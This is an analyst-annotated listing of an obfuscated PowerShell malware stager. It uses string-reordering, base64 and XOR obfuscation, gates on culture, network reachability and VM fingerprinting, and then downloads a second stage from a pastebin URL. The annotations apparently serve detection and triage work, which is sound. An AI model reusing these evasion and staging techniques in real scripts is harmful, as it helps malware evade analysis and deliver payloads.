- # Analyst annotation (review): obfuscated PowerShell stager with anti-analysis gates.
- # Flow as visible here: decode embedded strings -> reachability/timing check -> culture-gated
- # XOR decode -> WMI ping gate -> VM fingerprinting via WMI. Only when no VM indicator matches
- # does it fetch a second stage from pastebin. The listing is cut off after the final branch;
- # the assembled result is never used within view. Kept as a sample for detection/triage, NOT
- # repaired to run. Variable names use i/l/I/L case tricks; PowerShell variable names are
- # case-insensitive, so names that look different below are frequently the same variable.
- $webClientObj = New-Object System.Net.WebClient
- # Culture as text (name + LCID column); regex-matched against 1031 further down.
- $cultureInfoObj = Get-Culture | Out-String
- $utfEnc = [System.Text.Encoding]::UTF8
- # Five short base64 strings reassembled via -f placeholder reordering (defeats naive string grep).
- $parameter1 = ("{0}{2}{1}"-f'RhZH','g=','UB') # "{0}{2}{1}"-f'RhZH','g=','UB' -> RhZHUBg= (base64 encoded)
- $parameter2 = ("{2}{1}{0}"-f '=','CxY','RBYL')
- $parameter3 = ("{2}{0}{1}"-f 'EQB','xE=','SB')
- $parameter4 = ("{1}{2}{0}"-f '=','H','0cLUEc')
- $parameter5 = ("{0}{1}"-f 'FxEQDB','M=')
- # Base64-decode all five. The decoded bytes are not printable text on their own; they are
- # XOR-encoded a second time (key "jfh", see the loop below).
- ${ilLLLiiiLILililIli} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter2))
- ${LlliIiLIlIilLiiIlLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter1))
- ${iiLIiIliliILlIlLIiiLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter3))
- ${illlIillIllIIIiIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter5))
- ${IlllliiIlIliLllIiIiIIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter4))
- # Bytes of the DECODED parameter2 (this name differs from the decoded-parameter2 variable above only in letter case).
- $parameter2Arr = $utfEnc.GetBytes(${illLliIILilILilIli})
- # For the other four, bytes of the base64 TEXT itself, not of the decoded value.
- ${ilLLIiILiLLiiLLlll} = $utfEnc.GetBytes($parameter1)
- ${LlLIIiLiIilllII} = $utfEnc.GetBytes($parameter4)
- ${ILLlIIiIlliLlLlIi} = $utfEnc.GetBytes($parameter3)
- ${ilIlILLLLiIiiLiIIlLl} = $utfEnc.GetBytes($parameter5)
- # Repeating XOR key.
- $jfhArr = $utfEnc.GetBytes("jfh")
- # NOTE(review): missing `$` sigil -- this parses as a command named 'startTime', not an assignment.
- startTime = (Get-Date).Millisecond
- # Reachability gate. NOTE(review): the sense looks inverted relative to a usual "no internet =>
- # sandbox" check -- a non-empty response body triggers Exit; if the host is unreachable the
- # method presumably throws and execution falls through to the timing check. Confirm intent.
- IF ($webClientObj.DownloadString(("{6}{3}{0}{4}{1}{2}{5}" -f'tp:','/api.w','ipmani','t','/','a.com','h'))){ # http://api.wipmania.com
- Exit
- }
- $endTime = (Get-Date).Millisecond
- # .Millisecond is only the 0-999 ms component of the timestamp, so this difference wraps and
- # is not a real elapsed time. NOTE(review): the bare word 'startTime' inside an expression is
- # most likely a parse error, so the script as pasted probably does not run at all without edits.
- $duration = ($endTime - startTime) # measure how long it takes to get the web page
- # Prints only; no Exit, so the timing check has no effect on control flow.
- IF($duration -gt 300){
- Write-Host ("{1}{0}{2}{3}"-f 'ad ','B','t','iming.') # bad timing
- } ELSE {}
- # Strange (original note, in German)
- # 1961 - 930 = 1031, the LCID the original comment identifies as German (de-DE).
- $targetCulture = 1961 - 930 # german
- # German culture: repeating-key XOR of the decoded parameter2 bytes with "jfh". The inner
- # loop walks the key and forces j past its end once i runs off the data, i.e. plain
- # repeating-key XOR. Hand-decoding this branch appears to yield ".pcap" -- verify.
- IF($cultureInfoObj -match $targetCulture){${ililiLilILIIlllILIIiIlIillIILILLlLiI} = $(for (${I}=0; ${i} -lt $parameter2Arr.length;){
- for (${J}=0; ${J} -lt $jfhArr.length; ${J}++) {
- $parameter2Arr[${i}] -bxor $jfhArr[${J}]
- ${I}++
- if (${i} -ge $parameter2Arr.length) {
- ${j} = $jfhArr.length
- }
- }
- # Any other culture: same XOR, but over the raw base64 text of parameter4 (the three
- # differently-cased names here are one variable, the parameter4 byte array above).
- # Both branches assign the same (case-variant) result variable, consumed in the final ELSE.
- })} ELSE {${ILILILIlILiiLLlILiIIilIILliiLiLLLlII} = $(for (${i}=0; ${I} -lt ${LLLiiILIiiLllII}.length;){
- for (${j}=0; ${j} -lt $jfhArr.length; ${J}++) {
- ${LlliiiLIIILLlII}[${i}] -bxor $jfhArr[${j}]
- ${I}++
- if (${i} -ge ${llliIiliiILLlIi}.length) {
- ${j} = $jfhArr.length
- }
- }
- })}
- # VmJveHxWaXJ0dWFsfFZNd2FyZXxWTSB3YXJl -> Vbox|Virtual|VMware|VM ware
- # Regex alternation reused by every VM check below.
- $vmSigns = ("{0}{3}{6}{4}{9}{7}{1}{8}{10}{5}{2}"-f'VmJveH','Nd2F','3YXJl','xWa','dWF','TSB','XJ0','FZ','yZX','sf','xW')
- # select * from win32_pingstatus where address = '8.8.8.8'
- # Exits if the WMI ping query returns anything. NOTE(review): Win32_PingStatus normally yields a
- # row whether or not the target replied (StatusCode carries the result), so as written this
- # likely exits regardless of reachability -- confirm on a live host before relying on it.
- if (gwmi -query ((("{8}{0}{9}{7}{16}{6}{2}{10}{12}{11}{3}{5}{17}{1}{14}{13}{15}{4}" -f'elect','where ad','win','gstat','8EDz','us','om ','*','s',' ','3','in','2_p',' EDz','dress =','8.8.8.',' fr',' ')).replaCe('EDz',[STRing][CHAR]39))){Exit}
- # vm detection
- # VM fingerprinting chain: baseboard product, PnP entities, computer model, disk model, volume
- # name, BIOS version / serial / SMBIOS version, system drivers, services. -match against a
- # collection returns the matching (string-converted) elements, so a branch fires if any entry
- # matches. Each hit builds a distinct marker (a "\x00..."-looking string assembled via -f and
- # -replace; PowerShell does not interpret \x escapes, so it is literal text), prints it to the
- # console (the Write-Host name is the assigned name modulo case) and skips the download.
- IF(((gwmi win32_baseboard).Product) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IllLIIIlILIlililiLiLIiIillLLlIilIllL} = ((("{7}{10}{8}{0}{3}{11}{1}{2}{4}{6}{5}{9}" -f '6','b26x','00b26x14','x00b2','b26','x00b26x','x00b26','b2','b2','00','6x00','6x00')) -REplACe'b26',[CHar]92)
- Write-Host ${ILLLIiILIlILilIlILiLIiiILLlLLiiLiLll}
- } ELSEIF((gwmi win32_pnpentity) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IlIliliLIlIiLLLIliIiiLIILLiIliLLllII} = ((("{10}{2}{9}{7}{0}{3}{8}{4}{1}{5}{6}" -f 'r8x1a','x','00v','v','05vr8','10v','r8x04','8x00v','r8x00vr8x','r','vr8x')).rEPLACE('vr8','\'))
- Write-Host ${IlllIlIIiIlLllLIililLLlIiILILIliLiLi}
- } ELSEIF(((gwmi win32_computersystem).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${illLIiilILiLililIliLIiiILLLLlIilIllL} = ((("{5}{3}{4}{2}{1}{6}{0}"-f '00cAMx01','cAM','Mx00','AMx01','cAMx00cA','c','x')).RepLAcE('cAM','\'))
- Write-Host ${illLiIiLililiLiLIlILIIiIlLlLliIlillL}
- } ELSEIF(((gwmi win32_diskdrive).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${ILlLILIIiilLLllIIliLLLlIiILiliLiLIli} = ((("{3}{4}{5}{0}{2}{1}{6}" -f '01P9qx01P','P','9qx00','P','9qx0','1P9qxdaP9qx','9qx03')) -RePlaCe ([CHaR]80+[CHaR]57+[CHaR]113),[CHaR]92)
- Write-Host ${IlLliLiiIilllLLiILILLLliIILIlILILIlI}
- } ELSEIF(((gwmi win32_logicaldisk).VolumeName) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${iliLilIlIlIiLLliliIiiLIIllIilillllII} = ((("{5}{4}{2}{0}{1}{3}"-f'0{0}x00{0}x00{0}','x0','0}x0','1','{','{0}x01')) -f [CHAR]92)
- Write-Host ${IlLLIIIlILiLilIlilILiIIiLLLlLIiLiLLl}
- } ELSEIF(((gwmi win32_bios).Version) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${ilLLILiiIiLlllliILiLLLliiIlIlIlIlili} = ((("{0}{5}{2}{6}{1}{4}{3}"-f'{0}x','0','1{','{0}x03','}x00','0','0}xda{0}x01{0}x01{'))-f [cHar]92)
- Write-Host ${illLiLIIIilLLLLIilILLLLIiILiLilililI}
- # A BIOS serial of exactly "0" is treated as a VM indicator too.
- } ELSEIF(((gwmi win32_bios).SerialNumber) -eq "0"){
- ${IlLlilIIiILLlLLIiLILlLLIIiliLIlILilI} = ((("{8}{7}{0}{3}{2}{5}{9}{6}{1}{4}" -f'YGxda','x','8YGx018Y','8YGx01','03','Gx0','YG','18','8YGx0','08')) -rePLACe '8YG',[chaR]92)
- Write-Host ${ilLlIlIiIILLllLIilillLliiiLILilIlIli}
- } ELSEIF(((gwmi win32_bios).SMBIOSBIOSVersion) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IllliiilIlililILiLiliiiILLllliiLilLl} = ((("{7}{0}{1}{3}{4}{6}{5}{8}{2}"-f'00ZRC','x00ZRCx00','0','ZRCx00','ZRC','4ZRCx00ZRCx00Z','x1','ZRCx','RCx0')).RePlaCE('ZRC',[StrInG][chAR]92))
- Write-Host ${IlLLiiILILiLILiliLILiiiILllLLiiLIlll}
- } ELSEIF((gwmi win32_systemdriver) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${IlllIiiLIlilIlilililIiiIlLLlliIlIlLL} = ((("{7}{5}{3}{2}{4}{1}{0}{6}"-f 'x000zB','B','010zBx000zBx','x','000z','zB','x01','0'))-CrePLACe ([cHar]48+[cHar]122+[cHar]66),[cHar]92)
- Write-Host ${ILLlIIiliLILILIlILIlIIiiLllllIiLiLLL}
- } ELSEIF((gwmi win32_service) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
- ${ILIlIlILiLiILLLILIiIilIIlLIiliLlLLIi} = ((("{7}{0}{4}{5}{10}{2}{8}{6}{3}{9}{1}"-f '}x00','04','0','x05{0}x10{0}','{0}x00{0','}x','0}','{0','}x00{','x','1a{'))-F[chAR]92)
- Write-Host ${ILlliLiIIILlllliiLIlLlLiIIlilililILI}
- # No VM indicator matched: fetch the second stage from a pastebin raw URL. The original note
- # says the body starts D4 C3 B2 A1 02 00, which resembles a little-endian libpcap file header
- # (consistent with the ".pcap" XOR result above) -- treat as a hypothesis, not confirmed.
- } ELSE {
- #https://pastebin.com/raw/VbTHMA0T --> D4 C3 B2 A1 02 00
- ${IlLLiIiLILIlIliLIlILiiiiLLlLlIiLilll} = $webClientObj.DownloadString(("{5}{1}{2}{3}{0}{4}" -f 'w/VbTHMA','tps://pastebi','n.com/','ra','0T','ht'))
- # Redacted in the paste; its role (key, path, second URL, ...) cannot be determined from here.
- ${ILLlILIiiIllllliILILLlliiiliLiLilILI} = ("[REDACTED]")
- # downloaded body + redacted literal + XOR-decoded value (the three operands are the variables
- # assigned above, modulo case). The result is not referenced anywhere in the visible listing.
- ${iLLliiLI} = ${iLlLiiiLIlIlIliLiliLIIIIlllLLIiLilLl} + ${ILllIlIIIIlLlllIiLILllLiiIlILIlIlilI} + ${IliLiLILiliiLlliLiiiiLiIllIIlIllLLIi}
- }